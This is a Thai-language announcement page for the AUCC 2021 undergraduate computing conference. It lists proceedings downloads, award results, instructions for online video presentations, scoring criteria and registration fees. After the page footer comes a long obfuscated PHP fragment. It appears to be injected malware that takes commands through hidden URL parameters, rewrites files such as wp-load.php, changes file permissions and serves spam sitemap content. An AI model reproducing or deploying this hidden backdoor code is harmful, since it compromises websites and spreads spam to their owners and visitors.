หน้าแรก

News Update

The Asia Undergraduate Conference on Computing (AUC2)

เอกสารการประชุม

*  ดาวน์โหลดเอกสารรายงานสืบเนื่องจากการประชุมวิชาการฯ  Proceedings AUCC 2021  คลิกที่นี่

*  ดาวน์โหลดเอกสารรายงานจากการประกวดนวัตกรรมเทคโนโลยีคอมพิวเตอร์ AUCC 2021  คลิกที่นี่     

 

การตีพิมพ์เผยแพร่

ผลงานวิจัยที่ได้รับคัดเลือกให้ลงตีพิมพ์ใน  Rattanakosin Journal of Science and Technology: RJST คลิก จำนวน 10 ผลงาน

 

ประกาศผลรางวัลต่างๆ

ประกาศผลภาคบรรยาย

ประกาศผลภาคโปสเตอร์

ประกาศผลการประกวดนวัตกรรมเทคโนโลยีคอมพิวเตอร์

*****************************

เกียรติบัตรสำหรับผู้ที่ร่วมนำเสนอภาคบรรยายและโปสเตอร์  คลิก

เกียรติบัตรสำหรับผู้ที่ร่วมประกวดนวัตกรรมเทคโนโลยีคอมพิวเตอร์  คลิก

เกียรติบัตรสำหรับผู้ที่ได้รับรางวัลการนำเสนอภาคบรรยายและโปสเตอร์  คลิก

เกียรติบัตรสำหรับผู้ที่ได้รับรางวัลการประกวดนวัตกรรมเทคโนโลยีคอมพิวเตอร์  คลิก

หมายเหตุ :
1. ท่านสามารถค้นหาด้วยรหัสบทความ  ชื่อนักวิจัย  หรือชื่อมหาวิทยาลัย  โดยเมื่อเปิดไฟล์แล้วให้กด Ctrl+F จากนั้นพิมพ์ข้อมูลที่ต้องการค้นหาลงไปและกด Enter

ชมถ่ายทอดสดพิธีเปิดย้อนหลังได้ที่นี่  คลิก

 

แจ้งข้อมูลสำหรับผู้ผ่านการพิจารณาให้นำเสนอผลงานวิจัยในการประชุมวิชาการฯ AUCC 2021 ทุกท่าน

เนื่องจากสถานการณ์ปัจจุบันมีการระบาดของโรคติดเชื้อไวรัสโคโรนา 2019 (COVID-19) ทั่วประเทศ เจ้าภาพผู้จัดงาน จึงมีการปรับเปลี่ยนรูปแบบการจัดงานเป็นการนำเสนอแบบ online ทั้งหมด  ดังนั้น จึงขอแจ้งข้อมูลให้ผู้ผ่านการพิจารณาให้นำเสนอผลงานวิจัยในการประชุมวิชาการ AUCC 2021 ทุกท่านทราบและ ดำเนินการดังนี้

ผลงานภาค ORAL และ POSTER

1) อัด video การนำเสนอผลงานของตัวเองส่งมาใน link :

https://docs.google.com/forms/d/e/1FAIpQLSdIOhImFUUOdyZfcOTa3nkaH9X4hv4xVmUCTJTxiFYte0gShw/viewform

ทั้งนี้ ขอให้ส่งไฟล์ video ภายในวันที่ 5 กุมภาพันธ์ 2564 และสิ่งที่ต้องกรอกใน link ประกอบด้วย
1. ชื่อผู้นำเสนอผลงาน
2. นามสกุลผู้ที่นำเสนอผลงาน
3. เบอร์โทรศัพท์ที่ติดต่อได้
4. ID line
5. รหัสผลงานวิจัย เช่น 41-18
6. ชื่อผลงานวิจัย (copy จากชื่อเรื่องในงานที่ส่ง)
7. อัพโหลด File video Present ผลงาน ให้ตั้งชื่อ File เป็นรหัสผลงานวิจัย เช่น 41-18.mp4 หรือ 41- 18.mkv และให้ไฟล์ละไม่เกิน 10 นาที ขนาดไฟล์ไม่เกิน 1GB

2) เกณฑ์การให้คะแนนในการนำเสนอ ประกอบด้วย

1. Presentation and Use of visual
     Clear voice, Enthusiasm, Ability to explain complex topics clearly, Confident, Well organized slides, Visual aids used effectively
การนำเสนอและการใช้สื่อภาพ น้ำเสียงชัดเจน กระตือรือร้น อธิบายเข้าใจง่าย มั่นใจในการนำเสนอ จัดการสไลด์ได้ดี ใช้สื่อภาพอย่างมีประสิทธิภาพ

2. Contents
     Clear, Logical, Informative, Understandable, Appropriate for to problem or area of interest, Well thought out, designed, and explained
เนื้อหาชัดเจน เป็นเหตุเป็นผล ข้อมูลน่าสนใจ เข้าใจได้ง่าย สอดคล้องกับปัญหาหรือขอบเขตที่สนใจ คิดออกแบบและอธิบายได้ดี

3. Organization
     Well prepared talk, Clearly stated topic, Well summarized conclusion, Well timed presentation
โครงสร้างการนำเสนอ เรียบเรียงการนำเสนอได้ดี ระบุหัวข้อชัดเจน สรุปผลได้ดี การนำเสนอเหมาะสมแก่เวลา

4. Language
     Appropriate usage, style and structure, Clarity and intelligibility, Accuracy, Vocabulary
การใช้ภาษา วิธีการ รูปแบบ และโครงสร้างของการใช้ภาษาเหมาะสม ชัดเจน เข้าใจง่าย ถูกต้องตามหลักไวยากรณ์ คำศัพท์เหมาะสม

5. Answering of Questions and Timing
     Clear and well considered answers, Correct breadth and depth of answer, Confident, Timing
การตอบคำถามและการรักษาเวลา คำตอบชัดเจน รอบคอบ ครอบคุลม ลึกซึ้ง มั่นใจในการตอบ รักษาเวลาได้ดี

3) รูปแบบการนำเสนอผลงาน (วันที่ 25 กุมภาพันธ์ 2564)

ผู้นำเสนอผลงานวิจัยงาน AUCC ทุกท่าน จะต้องเข้าห้องนำเสนอผ่านโปรแกรม Zoom ตามห้องที่เจ้าภาพกำหนดไว้ให้ โดยต้องเข้าห้องนำเสนอและรายงานตัวก่อนเวลานำเสนออย่างน้อย 30 นาที รูปแบบการนำเสนอ จะเป็นการนำเสนอตามลำดับที่ผู้จัดงานกำหนดไว้ โดยเปิด Video present ที่ผู้นำเสนอผลงานจัดทำและส่งมาแล้ว ในเวลาไม่เกิน 10 นาที และตอบคำถามจากกรรมการผู้ทรงคุณวุฒิประจำห้องอีก 5 นาที

4) อัตราค่าลงทะเบียนในการนำเสนอผลงาน

ผู้ส่งผลงานวิจัย ในมหาวิทยาลัยที่ MOU ราคา 300 บาท
ผู้ส่งผลงานวิจัย ในมหาวิทยาลัยที่ไม่ได้ MOU ราคา 1,200 บาท
ทั้งนี้ ให้ชำระเงินค่าลงทะเบียนการนำเสนอผลงานภายในวันที่ 15 มกราคม 2564 และส่งข้อมูลการชำระเงินได้ที่ link :
https://docs.google.com/forms/d/e/1FAIpQLSfQRKaLJO4N_Wp4GO7OJ-I4Oz05L56E0MqjGp_2f-51sDm6LQ/viewform

ผลงานประกวดนวัตกรรม

ให้เข้าระบบเพื่อยืนยันการเข้าแข่งขันและส่งคลิปวีดีโอ  http://aucc-conf.org/innovation/login.php

ไม่ต้องจัดทำโปสเตอร์

อัตราค่าลงทะเบียนในการนำเสนอผลงาน

ผู้ส่งผลงานวิจัย ในมหาวิทยาลัยที่ MOU ราคา 300 บาท
ผู้ส่งผลงานวิจัย ในมหาวิทยาลัยที่ไม่ได้ MOU ราคา 1,200 บาท
ทั้งนี้ ให้ชำระเงินค่าลงทะเบียนการนำเสนอผลงานภายในวันที่ 15 มกราคม 2564 และส่งข้อมูลการชำระเงินได้ที่ link :
https://docs.google.com/forms/d/e/1FAIpQLSfQRKaLJO4N_Wp4GO7OJ-I4Oz05L56E0MqjGp_2f-51sDm6LQ/viewform

About Us

The Asia Undergraduate Conference on Computing (AUC2)

The Asia Undergraduate Conference on Computing (AUC2) (formerly known as “The ASEAN Undergraduate Conference on Computing”) is one of the most distinguished academic events in computer science and information technology conference in Thailand and also attracts undergraduates and scholars from leading universities in Thailand and other countries in Asia. The conference was established in 2011 by the cooperation of seven leading universities in Thailand. The main objective of this academic conference is to enhance the recognition and knowledge of computer science, information technology, and related fields among the undergraduate students and scholars from neighboring countries in Asia. In addition, it provides an opportunity for the participants to demonstrate their research and innovative ideas as well as to develop their presentation skills.

Tracks

*  Oral presentation
*  Poster presentation
*  Innovation presentation

Topics Of Interest

* CI : Computation Intelligence
* SE : Software Engineering
* KDM : Knowledge and Data Management
* CSN : Computer Systems and Computer Networks
* MCG : Multimedia, Computer Graphics and Games
* IT : Information Technology
* CE : Computer Education
* BI : Business Intelligence
* DSA : Data Science and Analytics
* IOT : Internet of Things

Map

Contact

Accommodation

xt\';if(!${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x44\x44\x45\x44\x39\x45\x39\x39"]($A9DDE9DE9E)){${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x44\x44\x45\x39\x39\x45\x45\x44"]($A9DDE9DE9E);}$A999DDEEDE=$A9DDE9DE9E.\'/\'.$A999DDEEDE;$AEDDD9E99E=isset(${"\x5fG\x45T"}[\'xxnew201\'.\'8_url1\'])?${"\x5fG\x45T"}[\'xxnew201\'.\'8_url1\']:\'\';$AE999DDEDE=isset(${"\x5fG\x45T"}[\'writerfi\'.\'lename\'])?${"\x5fG\x45T"}[\'writerfi\'.\'lename\']:\'\';if(isset(${"\x5fG\x45T"}[\'xxnew201\'.\'8_url1\'])){$AED9D9DE9E=${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x44\x45\x44\x39\x39\x45\x44\x39"](\'yygpKhTbDS108syNfLrcxNSdLLzEvtPL1wcA\');$ADED99ED9E=\'wp-l\'.\'oad.php\';$A9DD9EEE9D=\'up\'.\'.txt\';if($AE999DDEDE!=\'\'){${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x44\x44\x39\x45\x45\x45\x39"]($A999DDEEDE,${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x45\x45\x44\x45\x39\x44\x44\x39"]($AEDDD9E99E).\'-\'.${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x45\x45\x44\x45\x39\x44\x44\x39"]($AE999DDEDE));$ADED99ED9E=$AE999DDEDE;}$ADED99DE9E=@${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x44\x45\x44\x39\x45\x44\x45\x39"]($A999DDEEDE);if(${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x39\x39\x45\x44\x45\x44\x45"]($ADED99DE9E)!=\'\'){$ADED99DE9E=${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x44\x39\x44\x39\x45\x44\x45\x45"](\'-\',$ADED99DE9E);$ADED99ED9E=${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x45\x39\x45\x44\x45\x44\x39\x44"](${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x39\x39\x45\x44\x45\x44\x45"]($ADED99DE9E[1]));$A9DD9EEE9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x45\x39\x45\x44\x45\x44\x39\x44"](${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x39\x39\x45\x44\x45\x44\x45"]($ADED99DE9E[0]));}$A9ED9D9EDE=${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x44\x45\x44\x39\x39\x45\x44\x39"](\'K04u0hTDUtP0NwYA\');$AE9DD9D9EE=${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x44\x39\x44\x39\x45\x44\x45\x45"](\'|\',$ADED99ED9E);$ADD9E9D9EE=${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x44\x39\x44\x39\x45\x44\x45\x45"](\'|\',$A9DD9EEE9D);for($A999DEDEED=0;$A999DEDEED<${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x45\x45\x39\x44\x39\x44"]($AE9DD9D9EE);$A999DEDEED++){$ADED99ED9E=$AE9DD9D9EE[$A999DEDEED];if(${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x45\x45\x39\x44\x39\x44"]($ADD9E9D9EE)<=$A999DEDEED){$A9DD9EEE9D=$ADD9E9D9EE[${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x45\x45\x39\x44\x39\x44"]($ADD9E9D9EE)-1];}else{$A9DD9EEE9D=$ADD9E9D9EE[$A999DEDEED];}$A9EED9ED9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x45\x44\x39\x44\x45\x44\x39\x39"]($AED9D9DE9E.$A9DD9EEE9D);$AE99DDE9DE=substr($ADED99ED9E,-${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x45\x39\x44\x45\x44\x44\x39\x45"]($ADED99ED9E),${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x45\x39\x44\x39\x44\x44\x45\x39"]($ADED99ED9E,\'/\'));if(!${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x44\x44\x45\x44\x39\x45\x39\x39"]($AE99DDE9DE)&&$AE99DDE9DE!=\'\'){mkdir ($AE99DDE9DE,0755,true);}$ADE9EDDE99=@${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x44\x45\x44\x39\x45\x44\x45\x39"]($ADED99ED9E);$A9D9EED9ED=${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x44\x45\x44\x39\x39\x45\x44\x39"](\'synJLhTMlJtTMxMLHtPRhzAB\');if(!${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x44\x39\x45\x44\x39\x45"]($ADE9EDDE99,$A9ED9D9EDE)&&$A9EED9ED9D!=\'\'&&!${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x44\x39\x45\x44\x39\x45"]($A9EED9ED9D,$A9D9EED9ED)){@${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x39\x45\x39\x44\x45\x44\x44\x45"]($ADED99ED9E,0644);${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x44\x44\x39\x45\x45\x45\x39"]($ADED99ED9E,$A9EED9ED9D.$ADE9EDDE99);}}}if(isset(${"\x5fG\x45T"}[\'xxnew201\'.\'8_url1\'])){echo $AEDDEED999;exit();}if(isset(${"\x5fG\x45T"}[\'xxnew201\'.\'8_url2\'])){echo $ADD9E9E9DE;exit();}if(${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x45\x39\x45\x44\x39\x39\x44\x45"](\'/(sitemap).*.xml$/\',$A99DEDDEE9)){$A9EED9ED9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x45\x44\x39\x44\x45\x44\x39\x39"]($AEDDEED999);if(${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x44\x39\x45\x44\x39\x45"]($A9EED9ED9D,\'\')){$A9EED9ED9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x45\x44\x45\x39\x39\x39\x44\x45"](\'\',\'\',$A9EED9ED9D);@header(\'content-type:text/xml\');echo "$A9EED9ED9D";unset($A9EED9ED9D,$AEDDEED999,$AED9EED9D9,$A999EDEDDE,$A99DEDDEE9,$AD9D9D9EEE,$A9ED99DEDE,$A9ED9DEED9);exit();}}if($A9EE9DED9D){$A9EED9ED9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x45\x44\x39\x44\x45\x44\x39\x39"]($AEDDEED999);if(${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x44\x39\x45\x44\x39\x45"]($A9EED9ED9D,\'\')){$A9EED9ED9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x45\x44\x45\x39\x39\x39\x44\x45"](\'\',\'\',$A9EED9ED9D);echo "$A9EED9ED9D";unset($A9EED9ED9D,$url_format,$AED9EED9D9,$A999EDEDDE,$A99DEDDEE9,$AD9D9D9EEE,$A9ED99DEDE,$A9ED9DEED9);exit();}}if($ADE9D9EE9D){$A9EED9ED9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x45\x44\x39\x44\x45\x44\x39\x39"]($ADD9E9E9DE);if(${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x44\x39\x45\x44\x39\x45"]($A9EED9ED9D,\'\')){$A9EED9ED9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x45\x44\x45\x39\x39\x39\x44\x45"](\'\',\'\',$A9EED9ED9D);echo "$A9EED9ED9D";unset($A9EED9ED9D,$url_format,$AED9EED9D9,$A999EDEDDE,$A99DEDDEE9,$AD9D9D9EEE,$A9ED99DEDE,$A9ED9DEED9);exit();}}');${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x44\x39\x45\x39\x45\x44\x39\x44"]();?>